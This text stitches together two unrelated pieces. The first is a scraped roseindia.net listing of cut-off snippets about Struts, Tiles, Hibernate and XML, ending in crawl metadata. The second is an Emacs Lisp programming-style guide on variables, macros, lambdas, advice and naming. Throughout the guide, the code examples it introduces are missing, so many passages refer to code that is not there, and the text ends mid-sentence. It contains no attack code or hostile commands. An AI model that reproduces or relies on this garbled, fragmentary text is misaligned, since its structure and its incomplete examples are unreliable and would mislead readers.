Using... with Struts Tiles
In this lesson we will create Struts Tiles
Integrate Struts, Hibernate and Spring
are using one of the
best technologies (Struts, Hibernate and Spring). This tutorial...://struts.apache.org/download.cgi.
We are using Struts version
Download Hibernate...://.
We are using hibernate-3.1.3 for this tutorial.
Download Spring
XML Tutorials
-structured and so easy to grasp that they quickly
shift a beginner to XML-Java... Java XML processing APIs. Tutorial starts with
the brief introduction to XML... examples to help you master using XML
with Java. Advance topics like JAXP
Tiles Plugin
Tiles Plugin I have used tiles plugin in my projects but now I am... code written in tiles definition to execute two times and my project may has...://
Hope that it will be helpful for you
Struts 2 Tutorial
Struts 2 Tutorial
RoseIndia Struts 2 Tutorial and Online free training helps you learn new
elegant... Beans, ResourceBundles, XML etc.
Struts 2
Training! Get Trained Now tutorial.(include username and password) myself muthu,am working
Struts Articles
, using the Struts Portlet Framework
Having a good design... can be implemented in many ways using Struts and having many developers working... popular Struts features, such as the Validation Plug-In and Tiles Plug
Struts Links - Links to Many Struts Resources
Struts Tutorial: Struts 2 Tutorial for Web application development, Jakarta Struts Tutorial
Struts 2 Tutorials - Jakarta Struts Tutorial
Learn Struts 2... of Jakarta Struts shows you how to develop Struts applications using ant and deploy.... Many advance topics like Tiles, Struts Validation Framework, Java Script
Hibernate 4 One to Many mapping using XML
In this section, you will learn how to do one to many mapping of tables in Hibernate using Xml
Struts Console
visually edit Struts, Tiles and Validator configuration files.
The Struts Console... Struts Console
The Struts Console is a FREE standalone Java Swing
Top 10 Tips for Good Website Design
really make your content more readable than a bunch of loose texts or lines. Using...Designing a good website as to come up with all round appreciation, traffic flow and business conversion is really what determines the success of your web
xml
or attribute names from more than one XML vocabulary. If each vocabulary is given... the following links:
http...xml what is name space,xml scema give an example for each
SQL Tutorials for Beginner
SQL Tutorials for Beginner
SQL for Beginner
The Tutorial brings a unique introduction on SQL for
beginners, who
Struts Step by Step
a
beginner can go through the tutorial and learn struts.
The Struts Step-by-Step... by step struts tutorials, the step by step
tutorial on struts is grate to start programming in struts technology. Struts
framework is one the most used
Struts 2 online tutorial
Struts 2 online tutorial Where to learn struts 2 online tutorial? Is there any good tutorials on roseindia.net for learning struts 2 online tutorial?
Yes,
We have many tutorials for learning Struts 2 online through Book - Popular Struts Books
techniques for using struts. It may be for getting basic concepts of struts... very well. This is the first Struts book ever published and the one I bought when..., and so were Struts Validation, HTML , Bean, and Logic libraries. Tiles is also I want to create tiles programme using struts1.3.8 but i got jasper exception help me out
Java Beginner
Java Beginner can we declare a class inside an interface? where this type of declaration required? give one example
for php beginner
for php beginner write a program to find out a greatest number of n numbers using loop
java beginner
java beginner Hi
using hashcode() and equal() method and hashmap object how to compare employee lastname and firstname ,display in console
Retrieve data from xml using servlets
.
Thanks
Deepak
Hi,
Here is one tutorial: Create XML File using Servlet...Retrieve data from xml using servlets Hi plz send me the code for retrieving the data from xml File using Servlets.
Hi,
Do you want
Beginner Guide to Linux Server
Beginner Guide to Linux Server
... business are
trying Linux. In this tutorial I will show how Linux can installed easily...?
As a beginner you can try Red Hat 9.0 or Mandrake 10 for setting up your
server
Beginner Guide to Linux Server
Beginner Guide to Linux Server
Introduction
Linux is know for its security.... In this tutorial I will show how Linux can installed easily. This
is a general guide, So... flavor of Linux.
Which Linux Flavor?
As a beginner you can try Red Hat
XML parsing using Java - XML
XML parsing using Java I'm trying to parse a big XML file in JAVA..." in element "MIRate"(THE XML code is below).once he enters coverage rate I need... I need to select one table if input SheetName="PMI_STANDARD_MONTHLY
PHP Cookies and Sessions Flood protection using cookies Tutorial
PHP Flood Protection using session
In the following tutorial we will learn how to stop the undue input from
user, to put such kind of constraint you can use the following code
Learn Java for beginner
more.
One way to learn Java is through online training. Here a beginner in Java... are touched by the use of Java
and they knowingly or unknowingly are using... to
lectures or simply watch videos of how a program is created. This way one can
Jakarta Struts & Advanced JSP Course
Using Struts actions and action mappings to take control of ....
Using persistent data in a Struts application with
JDBC...
Basic XML
Jakarta Struts Training Course Outline
Tutorial of the week
programming technologies.
Hibernate Relationships tutorial using the mapping xml file(hbm.xml)
for the week of Feb 1, 20010
In this tutorial we... of hibernate mapping xml files (.hbm.xml)
Ajax Tutorial
for the week of Jan
Advance Struts Action
. The Struts2 framework reduces the complexity
using this xml file. This decides...Advance Struts2 Action
In struts framework Action is responsible... and action. For the good Action in Struts2
framework writing an action
Hibernate one-to-one relationships
. here is an example showing one to one relationship using hbm.xml.
We have two...Hibernate one-to-one relationships How does one to one relationship work in Hibernate?
Hibernate Mapping One-to-One
Hibernate provides
Complete Hibernate 4.0 Tutorial
Hibernate
One to One Mapping using XML...
Hibernate One to Many Mapping using XML
Hibernate
One to many... Indexed Mapping using List
Hibernate
One to many XML
Read XML using Java
Read XML using Java Hi All,
Good Morning,
I have been working... of all i need to read xml using java . i did good research in google and came to know...();
}
}
}
Parse XML using JDOM
import java.io.*;
import org.jdom.
Where to learn Struts 2?
Where to learn Struts 2? Hi,
I am beginner in Struts and trying to find good tutorial to learn Struts 2 framework. My project is in Struts 2... at Struts 2 Tutorial for Web application development section.
Thanks
Struts
Struts 1)in struts server side validations u are using programmatically validations and declarative validations? tell me which one is better ?
2) How to enable the validator plug-in file
DHTML Tutorial
DHTML Tutorial
Here you will read the various aspects of DHTML like what... that are
gathered as under one roof. Combination of these various technologies are the
HTML... be the dynamic and interactive. Using DHTML an author of page can add
effects
Struts Guide
;
- This tutorial is extensive guide to the Struts Framework. In
this tutorial you will learn how to develop robust application using Jakarta
Struts Framework. This tutorial assumes that the reader is familiar with the web
Dojo Tutorial
Dojo Tutorial
In this tutorial, you will learn everything about the dojo.
After completing the tutorial you will be able to develop good applications
using Dojo framework Projects
. In this tutorial we are using one of
the best technologies (Struts... learning easy
Using Spring framework in your application
Project in STRUTS Framework using MYSQL database as back end
Struts Projects are supported be fully
Java XML Books
;
Java
and XML Books
One night... of the book focuses on using XML from your Java applications. Java developers who... between XML and Java--one chapter teaches a facet of XML, such as DTDs and XML Schema
what is struts? - Struts
what is struts? What is struts?????how it is used n what... of the Struts framework is a flexible control layer based on standard technologies like Java Servlets, JavaBeans, ResourceBundles, and XML, as well as various Jakarta
JSF Tutorial for Beginners
of both worlds.
( As this tutorial presumes
a foundation in Struts, readers will do well to refer to the tutorial on Struts
in DeveloperIQ..Jan2005).
However... , presently using
Struts may switch over to JSF in the near future. In a few
Developing Struts PlugIn
. There are many PlugIns available for struts e.g. Struts Tiles PlugIn, Struts... are configured using the <plug-in>
element within the Struts configuration file... declaration instructs the struts to load and initialize the Tiles
plugin for your
Basics of Social Media Marketing for Beginner
Social Media Marketing Basics for the Beginner and Advanced
Basics of Social... the micro-blogs that are only just over one hundred characters
in length. This is the basic form of using social media marketing for networking.
SMM(Social Media
Struts application by using eclipse
Struts application by using eclipse Can we develop struts application by using eclipse ?
If no then please provide other development tools,
if yes can you mail me the tutorial or provide the same in roseindia
Using tiles-defs.xml in Tiles Application | http://roseindia.net/tutorialhelp/comment/1233 | CC-MAIN-2014-41 | refinedweb | 2,595 | 57.67 |
Dear All,
I am using mxGetPr function to retrieve the data of an array of type double.
#include "matrix.h" #include "math.h" #include "mex.h"
void mexFunction(int nlhs, mxArray *plhs[], int nrhs, const mxArray *prhs[]) { #define FACES prhs[0]
int nFaces; double *faces;
nFaces = mxGetM( FACES ); faces = mxGetPr( FACES );
for( int i=0; i<nFaces ; i++ ) mexPrintf("(%d): [ %d ]\n", i, faces[i] ); }
When I print the value of the first column of prhs[0], it's all zero while those of the input array is not zero and has different values. I checked with the documentation and many examples onlines and didn't see any difference between my code and theirs.
Could someone help me how to access the value of the elements of prhs[0] correctly? I also checked the type of input array using whos command and it is double.
Thanks,
Ahmad
No products are associated with this question.
MATLAB and Simulink resources for Arduino, LEGO, and Raspberry Pi testLearn more
Opportunities for recent engineering grads.Apply Today
New to MATLAB?Learn MATLAB today!
1 Comment
AP (view profile)
Direct link to this comment:
I changed it to mwSize but still I don't have access to correct values of prhs[0]. | http://www.mathworks.com/matlabcentral/answers/51444-problem-using-mxgetpr-for-accessing-array-of-type-double | CC-MAIN-2015-48 | refinedweb | 207 | 63.9 |
contains Unix Emacs Lisp programming information. It addresses the coding style of Emacs lisp and also presents notes about Emacs lisp byte compiler. Emacs Lisp code profiling is also examined and some profiling result presented.
This document won't introduce you to lisp, you must have basic knowledge about lisp programming beforehand: functions, local, global variables and various forms used in lisp. Mainly, this contains no ready solutions, functions, that you could use. There may be case studies though.
This document contains some guidelines that were found handy. There have also appeared also very good articles in the Usenet Emacs newsgroups and many good articles may have passed by, but hope you find those included interesting. It is recommended that you first read some elementary lisp reference before reading this paper.
Read this document as recommendations, not as strict rules. Adapt ideas that seem reasonable to you, and discard the others you feel, don't serve your needs.
The Elp (lisp profiling tool) results in the page are mainly for curious reader, when he needs some reference how to write tight loops, time critical functions. But normally there is not much need for optimization in Emacs: you run into performance problems very rarely. Be very skeptical when reading the results and do not put your blind trust on them.
Used Abbreviations
[jari] Jari Aalto
[kai] Kai Grossjohann
[vladimir] Vladimir Alexiev
Someone else reading your code will appreciate any extra explanation that you may have written. Someday the code may also be maintained by someone else than you, so bear in mind that the would-be-maintainer can take over your code, when you no longer are around.
Maintenance and readability comes first, never write tight code. Functions are easier to read if they are "airy" instead. Your code doesn't run any faster, no matter how much you shrink it. Some people like to delete all white spaces from their functions so that the code lines are stuck together; but that is not necessarily the best practice.
Organize parts that belong together, into groups and add dashes or anything to make it visible that something important is happening (function or condition)
Don't be afraid of using many variables. Especially in functions, that need local variables. A variable can "self document" the code if named properly. Use XEmacs byte compiler to check is you have defined variables that you haven't actually used, so that the byte compilation results are clean. (Note: The XEmacs byte compiler can better catch programming errors than Emacs byte compiler.)
In most cases the possible minor performance penalty of using many variables doesn't matter. See the profiling results later in this document.
Document your variables and functions well. If functions sets globals, say it in the docs (use "References:" tag). Every function and variable should have DOC-STRING, because when you do describe-symbols, it'll print out the SYMBOL and DOC-STRING. And one can even search through the doc strings with super-apropos Don't forget that the first line of the doc string should be a complete sentence.
Don't you feel frustrated too if staring at this?
Now you have to skim the code to understand how and where the variable is used. The original Emacs recommendation has been that you do need to document package private variables, like the one above. However this recommendation is old and dates back to 18.xx days where the doc-strings memory space was a limited resource. In new Emacs releases there is dynamic byte compilation option which reduces the docstring memory consumption. There is no need to "hand optimise" the doc-strings away.
Think about new comers when you program, who know nothing about lisp. Try to code clearly. Avoid tricks, which is not very frienly for readers of your code. At least document well why the code at that point looks so complex.
Check your code for variable leaks in fresh emacs "emacs -q" by running M-x byte-compile-file XXX.el. If possible use XEmacs's for checking because it reports warnings better.
Use error command if you cannot continue, or if you think that some other program may depend on your code, it is best that the other program cannot continue. Don't try unnecerrarily handle erorr conditions - it won't work in general with Emacs Lisp, like if you have got used to Java's or C++'s throw staements.
But not so general that it can eat apples and cars. It's "good", when the function doesn't get excessive long: still long cond statements are ok. Sometimes you just can't split the task into smaller parts or it makes no sense to split the function, oh well...use your best judgement.
Still, a long function raises always thoughts about bad coding. Usually there may be reusable parts, which can be separated, but then, perhaps no. Just make sure you are convinced you need that long function, and that's it.
Unclear code:
Maybe better written as:
Tip: To "line up" variables nicely in the let statement use some package that can do it, like tinytab.el, which is tab minor mode.
Let's start with example code:
This effectively causes foo, bar, test to be nil. Don't give the extra stuff fool you. The programmers intention was to clarify, that the foo is a list and by initialising it with () would signify a list context... and so on..
But it can be done it more cleanly. The more symbols there are in the view, the less easily can human eye focus to important things. Let's try this instead:
In this case, the variable names itself tell where they are used, and the missing symbols greatly improve the layout. You know, that variable is nil by default, so there is no point of assigning an empty list. Less is more, in most cases. In addition, when you use these variables inside function body, it's clear all the time what that stand for because the names tell them.
progn indents code right very fast and that makes writer to code in a tight space. All code examples below give exactly the same results.
Sometimes 'cond' statement can be used similarly. It has an implicit progn form:
And there is also and command, but it requires that all the statements you want to execute return non-nil. This may not be exactly usable every time.
Common lisp library, cl.el offers doing the same more cleanly. This is even more nicer. Prefer this one:
[vladimir] ...There are other even worse cases. The worst I can think of is mapcar with an inlined function:
This leaves too few columns for (do stuff). Especially if it contains another mapcar. This is much better:
Because you will be using globals a lot in Emacs lisp packages, couple of words may be in place You probably are shocked by the fact that lisp programs use globals (actually prefixed or namespace globals) all the time, when you have learned that using globals is totally wrong and should be avoided at any costs.
The class variables behave quite alike to global variables especially if the class derivation chain is long. Hm, to be strict, the scope of the variable just gets larger.
var1 is not real global, because it ceases to exist if the class is deleted. But, When you see code like this, where variable is "seen" outside of function, the instincts say that we should treat var1 like global. It's temptating to think that local is something that is inside function or function block, and variables outside of a function, while they may be actually packaged within class, are all "globals". Admittedly this is not very accurate distinction, but a practical point of view. In Emacs lisp, the variable scope is whole package and the variables are true globals because any other packages can see them too.
In Emacs Lisp you can also abstract the use of globals with the degree you want:
They are traditionally used in Emacs packages for
To clarify: the term aliasing used in next sections doesn't mean real aliasing. The variable is not actually referred through an alias. When you work with a alias variable, you can pretend that you actually work with the global variable. The alias term is used merely for purposes where you read the global when you use it in function. You do not write to a variable aliased like this. We're actually using a copy of variable.
The next sections will describe these benefits better, but the advantages of copying the global variables are listed here for quick reference:
[vladimir] ...If alias is used, the reader has to remember that `foo-mode-switch` and `switch` are the same thing. Furthermore, when you read the body of the function, foo-mode-switch is clearly a global var (perhaps a user option), while you have to look back at the 'let' in order to see that 'switch' is one. Introducing a second name to the same entity doesn't necessarily make anything more clear. There are only a few valid reasons to
full name seems too long. Of course, dabbrev or PC-lisp-complete-symbol will help you to write the long names, but what will help the reader to read them? of different name.
If any global variables is used in a function, don't use them directly, instead put them into function body let* where any anyone can see at a glance what variables are used. It also make maintaining process much simpler, since the changes have to be done into let* only. Prefer putting globals first in let.
The other benefit for the maintainer is that if he ever decides to move that global to function call parameter, the task is easy: you just lift the value from let-form to the parameter list, and you never have to touch the function body, because it uses the local variables.
You may later find out that it's actually better to call the function with list argument, so that function becomes more general. Following is the lifted global version of the previous function. Notice that the function body doesn't change in any way.
[Vladimir] also suggested that you really don't need this kind of abstraction, because converting function from #1a into #2a with function that use globals directly is as easy.
Hm. What do you think? I'd say that this is equal to mine what comes to lisp. But by using the same name in function argument list as for global variable, may makes things confusing, because my-mode-alist is originally meant to be global variable and used in other functions directly. The key point here was that we intended to make function more general, implying that we are probably moving it away from this my-mode package and including it into some general lisp library. If we move this function in #2a format, we wouldn't want to keep symbol names(variables), which refer to specific package my-mode.
Detecting reusable functions from any package is easier if the globals are presented in the first let statement.
Someone may now think in his mind:
Doesn't that make program more slower, I can avoid those private variables and let* altogether if I use globals directly.
Hm, yes and no; program won't slow down remarkably by the extra let* statement. More important is the ease of maintenance and ability to add comments beside the let statement, since all variables may not be self explanatory. If function is very small, use could those global variables directly to gain some more speed.
But if there is anything more than 10 line long function, for clarity's sake, use the alias method to hide the global from the actual body of function.
The only case where you may try to bother to optimise let* out is, when function gets called many times. Do you know that the function is dangerous to my program's performance? Probably not, that's why you sometimes use some lisp profiler (elp.el) to bog down speed problems.
The only exception when alias cannot be made in let is presented here. We may have to introduce a control function to read global. Suppose we have following situation.
Obviously it is not possible to read the global beforehand, if it will be changed by another function call during the execution of current function.
For small amount of globals, 5-10, there is no point to make separate control function for reading global, like in this following example.
The my-read-passwd, is implemented as
Using this single macro is overkill, but it may turn into more complex function later, if you decide to use many globals. See next:
The function is called with symbol describing the variable. This implementation totally hides the global variables from lisp calls and from other outside functions. You must decide how strong abstraction of data you want: For small programs, you probably don't need this kind of strong abstraction, but if the program gets bigger and you start having 20-50 globals, you may consider using similar global control functions.
Nowadays many books and many programmers teach that you should define variables inside block where you need them. This is perfectly good suggestion and you should follow it in natively compiled languages. The advise for Emacs Lisp is: "use when appropriate".
Note: There is slight difference in memory usage if you define a) all variables at the beginning of function b) along the execution of your program, where they are created and destroyed. While the A may take couple of bytes overall more memory, the important point is the content of the variables. If you put 100 cons cells immediately into the variable, that's hogging memory, not the variable definition itself.
In practice don't worry about this minor memory increase, because creating and destroying a variable increases overhead for functions too (multiple let statements), so how do you choose: a small memory increase at the beginning of file where you define all my variables or do you take chance on adding a slight overhead by defining variables while the function executes? In big, complex function this could be very important issue, but in short functions the choice is insignificant.
Most of the time you can use only one let* because it helps keeping function layout clearer, while admittedly that there are very good reasons when you could consider using multiple let* statements. you can arrange the inner body of function to self standing blocks by using many let statements and introduce new let statements where logically appropriate and many lisp programmers recommend that you do so.
In C++ using block local variables is pretty nice looking.
But If we do the same in Emacs lisp, the count of added parentheses may be disturbing:
If we were to write real lisp (not Emacs Lisp), the inner let variables could have been be optimized to registers and you should definitely use the multiple let statements. In Emacs lisp, this kind of optimizatrion does not happen because the code is not compiled to native machine code. That's why do not worry so much if all the variables are defined at the top-level let and not inside later let statements. You won't see any noticeable performance drop if you define couple of more variables at the beginning of function. That's why you see most of the time this format.
The idea for using only one let is that functions look like simple. In one let you can see what variables are used in a function and decide is some private variable is a candidate for global.
While they could look like this:
But while the variables can be defined without performance penalty, postpone initialisation if it takes lot of time. They are initialised only just before they are actually used.
Instead write code like this, which initialises variable only when condition goes into the branch.
Before going further, remember that all lisp forms return the last value which the form executed prior its ending. This is fundament of lisp language and whole lisp programming is based on it. The key here is that you can make the function's return value more visible: the point where the return value is set is obvious. If we use extra variable, say ret, over the implicit return value, the function is a) easier to debug: you can print the ret variable anywhere b) easier to follow: setting the return value is obvious 3) and one exit point is better than "hidden".
Of course if the function is very small or extremely simple, you don't have use 'ret': return value is already obvious. Use your common sense to determine when the extra return variable ret could clarify the function and when you decide to leave it out and use lisp form's side effects of returning value of last executed statement.
Alternative choice
And here are some extremely simple functions, compared to above function that would have had many lines of code. In here, the return values are clear.
Another advantage of using ret is, that it jumps into existence with default value nil. In function body, you just set it to another value if some condition is satisfied, otherwise called receives value nil by default.
[Andrew Fitzgibbon andrewfg@oculus.aifh.ed.ac.uk] It's common to use a descriptive symbol instead of t when passing arguments to functions. E.g.
It's a pain then that there's only one nil when you want to default an argument, meaning that you can't easily document it. It's just occurred to me however that you can write:
How should message displaying be controlled in good manner? If you print any messages, you can add variable verb to the optional parameter list. This variable should be the last element there; unless you have the &rest list of course. Now, why such an recommendation? Suppose your function is quite time consuming; eg. if it does some file handling and it may be a good idea to print some messages to the user about the progress stages.
This was the traditional way to code it, because the message is always printed, no matter how the function is called: interactively or by some top level function.
Thi may be better implementation. Messages are printed only if the user has called fucntion interactively. Do you see anything to make better here? If not, let's examine one more example.
There are couple of interesting points in this solution. First, it provides verbosity to the user. Second it provides verbosity to the caller too. The idea is, that by default the function is verbose when user calls it, but it also gives the verbose messages whenever someone else calls it..
The function can now be called like this and it keeps the used nicely aware of progress:
But the functions is recalled with the command with C-x ESC ESC followed by re-run with RET, the verbose messages are nnot printed.
This actualy makes user function easier to call, because you don't have to call them via M-x (or key binding) to get the verbose messages (like returning status, state of mode on/off). Developers can now turn on particular verbosity of some function if they think would be good to display messages to the user while function is executing.
Aha, now I hear someone claiming that the example 3 drains into this simple lisp call if verbosity is required by lisp call
Yes, it turns on the (interactive-p) test in function, but by using this it also activates interactive part of the function. If function had the interactive part like this, it would be executed:
Then the "What's up doc?" prompt would have been popped onto screen. The variable 'verb' is needed if the decision of printing message is given to the calling function.
Overriding means that the function exists already, but it doesn't do exactly what you want --> you want to write your own implementation which replaces the function. Sometimes there is Here are instructions how you override functions properly. If you just want to have some minor modification, then you should look at the advice.el (std emacs distribution), but to complete replace a function, you can fllow steps above.
First, make separate file, where you gather overridden functions. You use this file in next sections.
The body of the file looks something like this
Let]s start by defining our own mail-signature function which is defined in sendmail.el. First the Emacs startup file must be modified by adding this code to it:
Next, a function is added to replace the original. Add this code to emacs-rc-override.el after the "funcs" section:
or
Make sure you add some word like "My" or "Overridden" in front of the documentation string, so that when you look up the function description with M-x describe-function <func> or C-h f <func>, you don't mistakenly believe that is is standard emacs function If you overridden 1-2 functions, you may remember which ones you have rewritten, but when you start modifying emacs for your taste (I have 20-30 overridden functions), you can't remember which ones are "true" emacs functions.
Besides, if you post the solution to emacs newsgroups, people will appreciate the comment so that they get the describe-function information too. Inexperienced user's typically just copy the function from the post and if the word my is not there they may never know later that the function whether it was emacs's default or not that they're using...
Now you have the file ready and only thing left is to put one statement into your .emacs init file:
This loads the file and hooks everything for you. If you later want to override some other function, you just open the ~/.emacs.o again and (say we override some Gnus functions) add this to the forms section and write the function to the funcs section in emacs-rc-override.el
Note: When you use advice, make sure that the original behaviour of function is preserved. You don't want to break any existing packages that may use the advised function.
This is much better way than previously presented eval-after-load method. This time you need advice.el from standard emacs distribution. Why is this better? Because advice doesn't wipe out functions permanently, you can turn them on and off when needed.
The advice has flag around that lets you do things around then function: before and after calling it. But if you don't call ad-do-it inside advice, then you have effectively replaced the function. This is what you need
The important point here is that you say around and do not include advice macro ad-do-it in the body of function (which would call the original function). The advice is put into category my to refer to your definitions and finally it's put into immediate use: act means activate now.
Dewey M. Sasser dewey@newvision.com
Macros are (probably) the most difficult thing in LISP to understand, especially coming from a background in C or assembly. The big key in lisp is that a macro is just a function invoked by the evaluator to find out what it should really evaluate. This has two big implications:
It is not necessary (and because of feature #1, somewhat brain twisting) to call a macro from another macro.
When you write a macro, don't think of it as writing a macro, but as a function that will be called to translate the arguments (as you've specified) from the way they are to some other form. Your return value is the form to be executed instead.
For example:
But is a bit less obvious.
If you really want to hurt your brain, think about situation where you might want to do ',',form (which is valid code and I've seen it used, but never had to use it myself). You do this kind of thing when you write macros which produce other macros.
Dewey M. Sasser dewey@newvision.com
Lisp does not have "forward declarations", as in some other languages. In using Lisp, you should make sure that the definition has been seen before it is used.
If you define function A using function B, but before function B has been defined, it will work, but the byte compiler may not be able to check your call to function B. Also, if B is really a macro rather than a function, it's definition must have been seen before it is used. Remember that macros are expanded by the byte-compiler and do not actually get compiled into your code. Only the results are compiled in.
Anyone who programs in Lisp a lot (and you definitely do) should have a copy of CommonLisp:_the_Language_, 2nd Edition, by Guy L. Steel. Emacs Lisp is not strictly compatible with the language it defines, but Steel's book (commonly referred to as CLtL2) is a very good reference and description of how and while. It's not a tutorial, but an annotated standard.
Whenever possible, have your macros expand to normal lisp code, the way you'd write it if you weren't using macros. Since you wouldn't write a normal function like:
don't make your macro expand to that unless there's some very good reason. If you go look at my modefn.el, where modefn::define-mode-specific-function does the real work behind a "defmodemethod" call, you'll see that what it's doing is just building the proper defun!
This has the advantage of avoiding all of the nasty byte compiler tricks necessary to have something compiled as a function (like quoting with function, for example) or other things. Also, there's really no simple work-around for defvar. You pretty much have to use a defvar form. (OK, you could work around it, but it's a lot more work.)
I think that if you forget about the code you've written so far (I know, that's difficult to do), and rewrite it using what you now know, you'll save yourself a lot of work and get better results.
One important thing that you must remember when using macros is, that you must tell in autoload statement explicitly, that that defined symbol is a macro. Suppose following.
Now user builds his package using code from library Y and X. Sophisticated user doesn't want to slurp whole library, immediately, but he wants to instruct emacs to load functions on demand by adding autoload statements into the code.
Here is simple way to load packages
Slightly different way is presented below. The function y-function-this is loaded from package Y only when is is needed somewhere in the code.
And the bogus way would be
The last example fails, not during the byte compilation phase – it passes with flying colours, but in the middle of run time function it breaks. That's because the user forgot to mention that the the x-macro-this is a macro. What actually happened, was that in byte compiled file there is function call
But the macro should have been open coded and expanded! The right way to use the autoloads is:
Tip: See tinylisp.el and command '$ A' in tinylisp-mode which creates right autoload statements from any lisp package file.
This topic is throughly explained in the '(XEmacs lispref) Surprising Local Variables' and It is adviced that you read that section for better reference. If you have been using macros, you probably know about the dynamic scoping problem that may be occurring.
In the code above, macro's counter is visible to body and if there is also user defined "counter", then there is a serious name conflict.
One possible way to avoid this clashing is to use mangled variable names in local macros. Because the lisp is case sensitive, you can mix upper and lowercase letters to make unique variable name; the chance that body would have similar name is astronomically small. A non-clashing name could have been made from mixing the first and last characters:
Another way to use unique names I learned from a post by wbrodie@panix.com (Bill Brodie), gnu.emacs.help, 23 Aug 1996. He quoted my post where I wondered where I could use make-symbol command.
> In fact I don't know any use of the command
> make-symbol...
Probably its most common use is in writing macros, to make sure that a temporary variable introduced into the macro's expansion doesn't conflict with any user variables. For example:
[Vladimir]
The above is equivalent to nil on non-xemacs and 6 (or whatever) on emacs. The bytecompiler will compile (if nil (foo)) to nothing. If you used a function instead (or a variable), the bytecompiler would generate code to call it (fetch its value) and accordingly it will include both the emacs and xemacs variants of the code. This is slower and produces more code, however there's one significant shortcoming of the macro variant: code compiled with emacs won't work on xemacs and vice versa This makes it impossible to share .elc's one a site that has both emacsen installed.
It sometimes usefull to expand the macro to really see what happend in there. Evaluate these and be amazed
Dewey M. Sasser dewey@newvision.com
As an example, here's my start at the "minor-mode" wizard (you know, ever since Microsoft started using that term, I've hated it.) This code defines a macro "make-minor-mode", which can be invoked like this:
The above call expands to this:
Dewey M. Sasser dewey@newvision.com
Here is the complete macros that are used. Study them carefully.
Below is a very simple demonstaration how you use toplevel to call other macros that need symbols as arguments. The toplevel expects that the variables are know by name before hand.
[vladimir] Here's a macro to define toggle commands.
This executes some code after toggling the var:
This uses default-value and set-default as the get and set functions because url-be-asynchronous is buffer-local, and we need to manipulate its global value.
This goes wild: it uses special get/set functions and a special message
[Bill Dubuque wgd@martigny.ai.mit.edu] The above technique does not work to create a closure. The point of a closure is that it 'closes' over (captures) some lexically apparent bindings. The exact same binding may be shared by many different closures created in the same lexical context. If one of the closures alters the value of a closed variable, all the other closures will see the change.
E.g. one can use closures to implement data abstractions where the closed bindings essentially are state that is hidden by the abstraction. Here is a toy example that implements a counter with READ and INCREMENT methods:
Note how the same lexical binding of 'value' was captured in both the READ and INCREMENT closures returned by make-counter.
Dewey M. Sasser dewey@newvision.com comments:
Actually, I found when experimenting that the fset line is byte compiled. I suppose what that means is that byte-compiler is smart enough to treat the argument to "fset" as a function.
However, if you do a
I don't think it will be compiled; maybe you have to write
Here is another possibility
[*Dewey* comments more]
However, while the real function is installed there, the autoload won't notice it. Autoload is a magic text thing. When the ;;;###autoload token is read, the autoload library uses (read) to read the next form. Read does not expand macros (well, only reader macros like #', and evidently ` is a reader macro that expands to the old-style (` (,a)) syntax). It the above example you get nothing (autoload should really be rewritten to be extensible).
If you know the form will expand into "blah-func", which is a function, you can use:
or whatever the actual call to autoload that you want.
When you see some exiting new styled macro, you can convert it back to old format with trick presented by [dewey]
lambda is same as function, it is just "anonymous" function. So everything you can do with real function, you can do with lambda.
Lisp programmers use lambda functions very often, but many times it would be better to see real functions instead. The lambdas have their places in lisp, eg. for mapcar and inside macros they are often used. But overall, lambdas are not that good.
[Vladimir] also comments: There are several important things about using anon functions:
Let's see an example. Suppose we want to add some more regexps to error identification regexp list when the compile.el gets loaded.
Bad choice:
While looking perfectly valid, it has some problems. How do you post this answer to someone else? Maybe he already has used some other way and he doesn't like this approach. How do you change this setup afterwards, especially when your're experimenting with right regexps. Gosh! How do I remove the entry from the variable eval-after-load ?
In here things are simple. Easily modifiable. And easily handed to anyone else.
Possibly better choice:
Now, there is much more code involved here, but it is more portable. Remember the rule: space is cheap, ease of use comes first. Now you can also delete the entry easily from the eval-after-form.
The same lambda talk applies to global-set-key and add-hook cases It's much cleaner to have function than the lambda. If you post the solution, people will appreciate function more than lambda solution. Let's try it this way first:
Two obvious notes raise immediately: a) the indentation is disturbing, and limits more complex programming b) how do you use remove-hook for this ? Not very nice job... Turn this into a function and you're back to clear waters.
Advantages: no more lambda, no more indentation problems, you can use remove-hook easily, and you can print the hook contents nicely with the following. If there were lambdas, the output wouldn't be so nice.
(Be in scratch buffer, make sure lisp-mode is on, write the variable and Hit the C-u .. keys behind a variable)
[Vladimir] For short functions to put in hooks/define-keys, I prefer to put the function like below. Then I can remove-hook it if I need, or re-eval the above to redefine the function, and whatnot.
If you have loaded lisp packages from the net, you probably see many functions that are there "as is". Instead of just coding them there, you can ease the visibility of the functions by adding separator line before every function.
Traditional:
More visible choice:
The comments use ";;;", although ";;" would suffice when the comment is outside of function body. According to lisp commenting rules the ";;" would have parked to the left hand too. The reason is that, when every comment outside of function has ";;;", I can grep my files for "outside" comments. The ";;" style I leave to function bodies.
Few packages which might interest you, they all keep your code better organised.
folding.el
Included in latest XEmacs
uses folders {{{ }}}
tinybookmark.el
(b)ook(m)ark package "straight lines with names"
provides also X-popup for bookmarks
imenu.el
finding specific funtion, more detailed control.
Included in Emacs and XEmacs
When you're making a package, don't forget to include those important autoload directives to key functions. If your package is expected to be put through the emacs build process when update-file-autoloads will add your autoloads to loaddefs.el, and subsequent dumping of that file with emacs will make them a permanent part of the emacs executable. (Usually loaddefs.el is dumped, so simply updating it and bytecompiling it won't cause it to be loaded at startup time.) Some sysadm may decide to keep your packages permanently in his emacs installation and he can rip the autoloads from your file with M-x generate-file-autoloads (function is defined in autoload.el).
Common idiom in lisp programs has been that the names contain only [-a-zA-Z] characters and so case chosen isn't generally mixed: My-Var is bad variable name. Also the traditional package definition convention has been:
Here the first 'words' always specifies the package that is using the name space bucket, here csh-mode. Remember that symbol names are put to global name space, so each function and each variable must be unique.
In comp.lang.emacs, comp.emacs.xemacs and gnu.emacs.help where people are likely to post their own solution to other peoples, it seems that only few are aware of how they should name their symbols properly. The problem is that if you post code that has function name:
How do you know afterwards (when you just grab the code and save it somewhere in your .emacs or personal "snippet" lib) when you start writing code using that function, that it wasn't a Emacs distributed function or variable?
The problem arises too, if you name the functions so, that they start with your initials:
Now, what's wrong with that? Well, if you're going to post such code that have lot's of functions and variables starting with prefix joe- , people get upset when they save the functions and notice that there is someone other's initials involved. They just wanted to have some general function to solve current task.
Now, when they ask help again, someone else posts his own functions and they end up gathering functions:
Putting those into .emacs doesn't look pretty.
It becomes obvious that it would be nice if everybody would use common naming convention, so that the code can be handed to anybody without changes. The best way to achieve this is that people use prefix:
